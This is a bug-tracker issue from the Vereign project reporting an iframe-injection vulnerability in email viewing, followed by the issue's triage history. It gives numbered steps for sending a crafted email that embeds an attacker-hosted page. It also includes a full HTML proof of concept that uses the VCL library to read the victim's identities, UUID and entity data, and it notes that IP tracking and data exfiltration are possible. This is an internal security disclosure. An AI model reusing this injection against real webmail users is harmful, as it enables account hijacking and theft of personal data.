Intruder can access to the user data and work from user account

Access to user data and work/act like it was a user

Note: We need to agree where to fix the issue - because we dont control how we are sending the email (when we speak about RoundCube )

for this below you don't need to prepare fake message.... It can be signed with your account, but you can put the iframe there, too.
Same technique applies if we put any link to external resource we can track user ips and so on via this approach

I injected this page via iframe.

A way how to inject https://code.vereign.com/code/vcl/issues/28#note_25235 (4th point in a ticket)

    1) Prepare fake email message, set user email ("To" section), change message id

    2) Paste <iframe src="http://localhost:8000"></iframe> to the email body

    3) Change http://localhost:8000 to the URL where this script will be hosted
        Should be https, if the user works on https

    4) Send an email

    5) Wait until the user opens this email in the Vereign interface

Comments:

I do not have access to user localstorage, but I can work with VCL library which has access.

Change bellow https://alexeylunin.dev.vereign.com to the URL user is working on

So, now I can work from this injected script as a user

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Title</title>
</head>
<body>
    <script src="https://alexeylunin.dev.vereign.com/vcl/js/client"></script>
    <script>
        console.log("Injected: setupViamAPI");
      window.setupViamAPI(
        "hackDiv",
        {
          onEvent: () => {}
        },
        "https://alexeylunin.dev.vereign.com/vcl/js/iframe",
        "https://alexeylunin.dev.vereign.com/api/",
        "https://alexeylunin.dev.vereign.com/wopi/",
        "https://alexeylunin.dev.vereign.com"
      ).then(async function(lib) {
        window.lib = lib;
        console.log("Injected: Lib is initialized");

        var identities = await lib.listIdentities();
        console.log("Injected: User identities: ", identities);

        var currentUUID = await lib.getCurrentlyLoggedInUUID();
        console.log("Injected: Current UUID: ", currentUUID.data);

        var entity = await lib.entityGetEntity(currentUUID.data);
        console.log("Injected: Current entity: ", entity);
        console.log("Injected: Also I can send data to somewhere");
      });
    </script>
    <div id="hackDiv"></div>
</body>
</html>

Edited 5 years ago

Designs

Child items ...

Activity

Kalin Canov added P1 label 6 years ago

added P1 label
Kalin Canov removed P2 label 6 years ago

removed P2 label
Kalin Canov changed the description 6 years ago

changed the description
Kalin Canov changed milestone to %v0.18 5 years ago

changed milestone to %v0.18
Kalin Canov changed milestone to %v0.17 5 years ago

changed milestone to %v0.17
Kalin Canov assigned to @alexey.lunin 5 years ago

assigned to @alexey.lunin
Kalin Canov added DevInProgress label 5 years ago

added DevInProgress label
Kalin Canov removed milestone 5 years ago

removed milestone
Alexey Lunin changed title from Access to user data and work like it was a user to Intruder can access to the user data and work from user account 5 years ago

changed title from Access to user data and work like it was a user to Intruder can access to the user data and work from user account
Alexey Lunin removed DevInProgress label 5 years ago

removed DevInProgress label
Alexey Lunin @alexey.lunin · 5 years ago

Developer

The fix will be implemented in a context of the tickets #50 (closed) and https://code.vereign.com/code/dashboard/issues/719
Kalin Canov unassigned @alexey.lunin 3 years ago

unassigned @alexey.lunin

Please register or sign in to reply